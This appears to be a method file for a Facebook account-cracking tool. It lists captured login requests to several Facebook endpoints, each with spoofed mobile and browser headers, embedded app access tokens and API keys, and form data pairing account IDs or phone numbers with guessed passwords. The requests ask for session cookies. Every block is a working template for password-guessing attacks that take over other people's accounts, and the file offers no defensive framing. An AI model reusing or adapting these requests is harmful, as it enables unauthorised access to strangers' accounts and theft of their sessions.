
---- Xiyad File Method 1 -------+
Url >> https://b-graph.facebook.com/auth/login?include_headers=false&decode_body_json=false&streamable_json_response=true
Header >> {'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 9; JMM-AL00 Build/QP1A.690700.400) [FBAN/FB4A;FBAV/459.0.0.27.84;FBBV/585417349;FBDM/{density=3.0,width=1080,height=2245};FBLC/en_US;FBRV/277662387;FBCR/hallon;FBMF/motorola;FBBD/motorola;FBPN/com.facebook.katana;FBDV/Moto G (5S) Plus;FBSV/8.1.0;FBOP/1;FBCA/armeabi-v7a:armeabi;]', 'Accept-Encoding': 'gzip,deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Host': 'b-graph.facebook.com', 'Authorization': 'OAuth 275254692598279|585aec5b4c27376758abb7ffcb9db2af', 'X-FB-Net-HNI': '23886', 'X-FB-SIM-HNI': '28326', 'X-FB-Client-IP': 'True', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-Tigon-Is-Retry': 'False', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Connection-Quality': 'MOBILE.LTE', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62', 'X-FB-Connection-Bandwidth': '82297424', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Connection-Type': 'MOBILE.LTE', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '795'}
Data >> {'adid': '6309Aebb66C0e004', 'device_id': 'af6b1581-534c-4bf0-b4fb-8ff82acee7cc', 'family_device_id': 'b0b670b7-7d96-4655-97a6-f67343fe70d3', 'secure_family_device_id': '7b455c94-2002-4eef-aec5-8425fe077373', 'advertiser_id': 'ea91b71a-1e9c-4f58-b060-dd4776c36da5', 'format': 'json', 'cpl': 'true', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'register_api', 'email': '61557633272065', 'password': 'prakash', 'access_token': '275254692598279|585aec5b4c27376758abb7ffcb9db2af', 'generate_session_cookies': '1', 'meta_inf_fbmeta': 'NO_FILE', 'currently_logged_in_userid': '0', 'locale': 'en_GB', 'client_country_code': 'GB', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d', 'sig': 'cc331688c9ec07059af4df9dbdcf7737'}##### Xiyad File m1####

-------- Xiyad Fils Method 2 --------+
url >> https://api.facebook.com/auth/login
header >> {'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 9; JMM-AL00 Build/QP1A.690700.400) [FBAN/FB4A;FBAV/459.0.0.27.84;FBBV/585417349;FBDM/{density=3.0,width=1080,height=2245};FBLC/en_US;FBRV/277662387;FBCR/hallon;FBMF/motorola;FBBD/motorola;FBPN/com.facebook.katana;FBDV/Moto G (5S) Plus;FBSV/8.1.0;FBOP/1;FBCA/armeabi-v7a:armeabi;]', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '23690', 'X-FB-SIM-HNI': '33728', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62', 'x-fb-device-group': '5760', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62'}
data >> {'adid': 'b315bbb8-d655-4921-a57c-a767cc99fca3', 'format': 'json', 'device_id': 'a7511c69-30b6-4924-9221-d60c7428191c', 'cpl': 'true', 'family_device_id': 'f4d299c0-39e9-4d8c-a4ff-825d764d372f', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': '61557631012544', 'password': 'mithun', 'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'meta_inf_fbmeta': '', 'advertiser_id': 'db000683-8261-4a7a-b5cb-1fb7bdc2f853', 'currently_logged_in_userid': '0', 'locale': 'en_US', 'client_country_code': 'US', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}

-------- Xiyad Fils Method 3 --------+
url >> https://graph.facebook.com/auth/login
header >> {'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 9; JMM-AL00 Build/QP1A.690700.400) [FBAN/FB4A;FBAV/459.0.0.27.84;FBBV/585417349;FBDM/{density=3.0,width=1080,height=2245};FBLC/en_US;FBRV/277662387;FBCR/hallon;FBMF/motorola;FBBD/motorola;FBPN/com.facebook.katana;FBDV/Moto G (5S) Plus;FBSV/8.1.0;FBOP/1;FBCA/armeabi-v7a:armeabi;]', 'Accept-Encoding': 'gzip, deflate', 'Accept': '/', 'Connection': 'Keep-Alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '38646', 'X-FB-SIM-HNI': '25001', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62', 'x-fb-device-group': '5090', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62', 'Content-Length': '698'}
data >> {'adid': 'CD7F6ee317D6DF1B', 'format': 'json', 'device_id': 'fcfac271-d093-4556-bb4d-6f5ef5a296dd', 'cpl': 'true', 'family_device_id': 'c0198c43-eedc-4ba3-96d8-1e5e96a770dd', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': '61557631676111', 'password': 'arjun', 'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'meta_inf_fbmeta': '', 'advertiser_id': '849ef690-1ad3-4663-b286-3b0240ec6ff5', 'currently_logged_in_userid': '0', 'locale': 'en_US', 'client_country_code': 'US', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}

-------- Xiyad Fils Method 4 --------+
url >> https://b-graph.facebook.com/auth/login
header >> {'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 9; JMM-AL00 Build/QP1A.690700.400) [FBAN/FB4A;FBAV/459.0.0.27.84;FBBV/585417349;FBDM/{density=3.0,width=1080,height=2245};FBLC/en_US;FBRV/277662387;FBCR/hallon;FBMF/motorola;FBBD/motorola;FBPN/com.facebook.katana;FBDV/Moto G (5S) Plus;FBSV/8.1.0;FBOP/1;FBCA/armeabi-v7a:armeabi;]', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '38155', 'X-FB-SIM-HNI': '27230', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62'}
data >> {'adid': 'febc61c2-4a37-49bf-acb9-5631492d8c76', 'format': 'json', 'device_id': 'de12ed74-50ff-4d59-a120-f759fa3190bd', 'cpl': 'true', 'family_device_id': '7d39d818-3524-4db1-8c07-e7b547dfbcb0', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': '61557631281934', 'password': 'yahya', 'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'meta_inf_fbmeta': '', 'advertiser_id': 'f41cb011-460b-4b68-92bf-50cba0e44d1f', 'currently_logged_in_userid': '0', 'locale': 'en_GB', 'client_country_code': 'GB', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}

-------- Xiyad Fils Method 4 --------+
Error


###### Random All Method #####


-------- Xiyad Random Method 1 --------+
url >> https://mbasic.facebook.com/login.php?skip_api_login=1&api_key=24324666158&kid_directed_site=0&app_id=24324666158&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fv15.0%2Fdialog%2Foauth%3Fapp_id%3D24324666158%26cbt%3D1710876820243%26channel_url%3Dhttps%253A%252F%252Fstaticxx.facebook.com%252Fx%252Fconnect%252Fxd_arbiter%252F%253Fversion%253D46%2523cb%253Df69462082bfdf1c33%2526domain%253D500px.com%2526is_canvas%253Dfalse%2526origin%253Dhttps%25253A%25252F%25252F500px.com%25252Ffd5faeb6261c9fdbb%2526relation%253Dopener%26client_id%3D24324666158%26display%3Dpopup%26domain%3D500px.com%26e2e%3D%257B%257D%26fallback_redirect_uri%3Dhttps%253A%252F%252F500px.com%252Flogin%253Fr%253D%25252Fsignup%26locale%3Den_US%26logger_id%3Df98c570566fb31bf3%26origin%3D1%26redirect_uri%3Dhttps%253A%252F%252Fstaticxx.facebook.com%252Fx%252Fconnect%252Fxd_arbiter%252F%253Fversion%253D46%2523cb%253Dfed203624018fbd41%2526domain%253D500px.com%2526is_canvas%253Dfalse%2526origin%253Dhttps%25253A%25252F%25252F500px.com%25252Ffd5faeb6261c9fdbb%2526relation%253Dopener%2526frame%253Df70354410e51afadd%26response_type%3Dtoken%252Csigned_request%252Cgraph_domain%26scope%3Demail%26sdk%3Djoey%26version%3Dv15.0%26ret%3Dlogin%26fbapp_pres%3D0%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Dfed203624018fbd41%26domain%3D500px.com%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252F500px.com%252Ffd5faeb6261c9fdbb%26relation%3Dopener%26frame%3Df70354410e51afadd%26error%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied&display=popup&locale=en_GB&pl_dbl=0
header >> {'Host': 'mbasic.facebook.com', 'content-length': '418', 'x-fb-lsd': 'AVq9ApvLi-0', 'origin': 'https://mbasic.facebook.com', 'content-type': 'application/x-www-form-urlencoded', 'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; SM-J260F Build/M1AJB; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/122.0.6261.64 Mobile Safari/537.36 [FBAN/EMA;FBLC/en_US;FBAV/459.0.0.27.84;FB_FW/1;FBDM/{density=3.0,width=1080,height=2245},xdpi=221.225, ydpi=221.672};]', 'accept': '*/*', 'x-requested-with': 'XMLHttpRequest', 'sec-ch-ua': '"Chromium";v="106", "Google Chrome";v="106", "Not;A=Brand";v="99"', 'sec-ch-ua-platform': '"Android"', 'sec-ch-ua-mobile': '?1', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty', 'sec-fetch-user': '?1', 'referer': 'https://mbasic.facebook.com/v15.0/dialog/oauth?app_id=24324666158&cbt=1710876820243&channel_url=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df69462082bfdf1c33%26domain%3D500px.com%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252F500px.com%252Ffd5faeb6261c9fdbb%26relation%3Dopener&client_id=24324666158&display=popup&domain=500px.com&e2e=%7B%7D&fallback_redirect_uri=https%3A%2F%2F500px.com%2Flogin%3Fr%3D%252Fsignup&locale=en_US&logger_id=f98c570566fb31bf3&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Dfed203624018fbd41%26domain%3D500px.com%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252F500px.com%252Ffd5faeb6261c9fdbb%26relation%3Dopener%26frame%3Df70354410e51afadd&response_type=token%2Csigned_request%2Cgraph_domain&scope=email&sdk=joey&version=v15.0&ret=login&fbapp_pres=0&tp=unspecified', 'accept-encoding': 'gzip, deflate br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
data >> {'lsd': 'AVq9ApvLi-0', 'jazoest': '2890', 'm_ts': '1712853892', 'li': 'hBMYZh8dinRk7uOXqEA04JpC', 'try_number': '0', 'unrecognized_tries': '0', 'email': '01798989365', 'pass': '98989365', 'prefill_contact_point': '', 'prefill_source': '', 'prefill_type': '', 'first_prefill_source': '', 'first_prefill_type': '', 'had_cp_prefilled': 'false', 'had_password_prefilled': 'false', 'is_smart_lock': 'false', 'bi_xrwh': '0'}

-------- Xiyad Random Method 2 --------+
url >> https://touch.facebook.com/login.php?skip_api_login=1&api_key=24324666158&kid_directed_site=0&app_id=24324666158&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fv15.0%2Fdialog%2Foauth%3Fapp_id%3D24324666158%26cbt%3D1710876820243%26channel_url%3Dhttps%253A%252F%252Fstaticxx.facebook.com%252Fx%252Fconnect%252Fxd_arbiter%252F%253Fversion%253D46%2523cb%253Df69462082bfdf1c33%2526domain%253D500px.com%2526is_canvas%253Dfalse%2526origin%253Dhttps%25253A%25252F%25252F500px.com%25252Ffd5faeb6261c9fdbb%2526relation%253Dopener%26client_id%3D24324666158%26display%3Dpopup%26domain%3D500px.com%26e2e%3D%257B%257D%26fallback_redirect_uri%3Dhttps%253A%252F%252F500px.com%252Flogin%253Fr%253D%25252Fsignup%26locale%3Den_US%26logger_id%3Df98c570566fb31bf3%26origin%3D1%26redirect_uri%3Dhttps%253A%252F%252Fstaticxx.facebook.com%252Fx%252Fconnect%252Fxd_arbiter%252F%253Fversion%253D46%2523cb%253Dfed203624018fbd41%2526domain%253D500px.com%2526is_canvas%253Dfalse%2526origin%253Dhttps%25253A%25252F%25252F500px.com%25252Ffd5faeb6261c9fdbb%2526relation%253Dopener%2526frame%253Df70354410e51afadd%26response_type%3Dtoken%252Csigned_request%252Cgraph_domain%26scope%3Demail%26sdk%3Djoey%26version%3Dv15.0%26ret%3Dlogin%26fbapp_pres%3D0%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Dfed203624018fbd41%26domain%3D500px.com%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252F500px.com%252Ffd5faeb6261c9fdbb%26relation%3Dopener%26frame%3Df70354410e51afadd%26error%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied&display=popup&locale=en_GB&pl_dbl=0
header >> {'Host': 'touch.facebook.com', 'content-length': '416', 'x-fb-lsd': 'AVrCWD1E4WM', 'origin': 'https://touch.facebook.com', 'content-type': 'application/x-www-form-urlencoded', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Vivaldi/6.6.3271.57', 'accept': '*/*', 'x-requested-with': 'XMLHttpRequest', 'sec-ch-ua': '"Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"', 'sec-ch-ua-platform': '"Android"', 'sec-ch-ua-mobile': '?1', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty', 'sec-fetch-user': '?1', 'referer': 'https://touch.facebook.com/v15.0/dialog/oauth?app_id=24324666158&cbt=1710876820243&channel_url=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df69462082bfdf1c33%26domain%3D500px.com%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252F500px.com%252Ffd5faeb6261c9fdbb%26relation%3Dopener&client_id=24324666158&display=popup&domain=500px.com&e2e=%7B%7D&fallback_redirect_uri=https%3A%2F%2F500px.com%2Flogin%3Fr%3D%252Fsignup&locale=en_US&logger_id=f98c570566fb31bf3&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Dfed203624018fbd41%26domain%3D500px.com%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252F500px.com%252Ffd5faeb6261c9fdbb%26relation%3Dopener%26frame%3Df70354410e51afadd&response_type=token%2Csigned_request%2Cgraph_domain&scope=email&sdk=joey&version=v15.0&ret=login&fbapp_pres=0&tp=unspecified', 'accept-encoding': 'gzip, deflate br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
data >> {'lsd': 'AVrCWD1E4WM', 'jazoest': '2821', 'm_ts': '1712854051', 'li': 'IxQYZofEwb4ws_Z9_X7M5QMQ', 'try_number': '0', 'unrecognized_tries': '0', 'email': '01728377015', 'pass': '017283', 'prefill_contact_point': '', 'prefill_source': '', 'prefill_type': '', 'first_prefill_source': '', 'first_prefill_type': '', 'had_cp_prefilled': 'false', 'had_password_prefilled': 'false', 'is_smart_lock': 'false', 'bi_xrwh': '0'}

-------- Xiyad Random Method 3 --------+
url >> https://p.facebook.com/login/device-based/regular/login/?refsrc=deprecated&amp;lwv=100&amp;refid=8
header >> {'authority': 'p.facebook.com', 'method': 'GET', 'scheme': 'https', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language': 'en-US,en;q=0.9', 'cache-control': 'max-age=0', 'dpr': '2.75', 'sec-ch-prefers-color-scheme': 'light', 'sec-ch-ua': '"Not)A;Brand";v="24", "Chromium";v="116"', 'sec-ch-ua-full-version-list': '"Not)A;Brand";v="24.0.0.0", "Chromium";v="116.0.5845.61"', 'sec-ch-ua-mobile': '?1', 'sec-ch-ua-model': '"M2010J19CG"', 'sec-ch-ua-platform': '"Android"', 'sec-ch-ua-platform-version': '"12.0.0"', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.81'}
data >> {'lsd': 'AVrny0iz0Ns', 'jazoest': '21012', 'm_ts': '1712854063', 'li': 'LxQYZgCc2fEEsi8AO8S4fkFp', 'try_number': '0', 'unrecognized_tries': '0', 'email': '01737235012', 'pass': '01737235012', 'login': 'Log In'}

-------- Xiyad Random Method 4 --------+
url >> https://touch.facebook.com/login/device-based/login/async/?refsrc=deprecated&lwv=100
header >> {'authority': 'touch.facebook.com', 'method': 'GET', 'scheme': 'https', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language': 'en-US,en;q=0.9', 'dpr': '1.5', 'sec-ch-prefers-color-scheme': 'light', 'sec-ch-ua': '"Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"', 'sec-ch-ua-full-version-list': '"Google Chrome";v="123.0.6312.88", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.88"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-model': '""', 'sec-ch-ua-platform': '"Windows"', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'viewport-width': '270', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.81'}
data >> {'lsd': 'AVoFkPN0gKM', 'jazoest': '2900', 'm_ts': '1712854184', 'li': 'qBQYZkm3rFya_QBtZc2wTwCb', 'try_number': '0', 'unrecognized_tries': '0', 'email': '01744835031', 'pass': '01744835031', 'login': 'Log In'}

-------- Xiyad Random Method 5 --------+
url >> https://touch.facebook.com/login/device-based/regular/login/?refsrc=deprecated&amp;lwv=100&amp;refid=8
header >> {'authority': 'touch.facebook.com', 'method': 'GET', 'scheme': 'https', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language': 'en-US,en;q=0.9', 'dpr': '1.5', 'sec-ch-prefers-color-scheme': 'light', 'sec-ch-ua': '"Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"', 'sec-ch-ua-full-version-list': '"Google Chrome";v="123.0.6312.88", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.88"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-model': '""', 'sec-ch-ua-platform': '"Windows"', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'viewport-width': '270', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36'}
data >> {'lsd': 'AVrByVL_U8s', 'jazoest': '2965', 'm_ts': '1712854303', 'li': 'HxUYZpGwMrRXNEUTxwHedNah', 'try_number': '0', 'unrecognized_tries': '0', 'email': '01792082606', 'pass': '92082606', 'login': 'Log In'}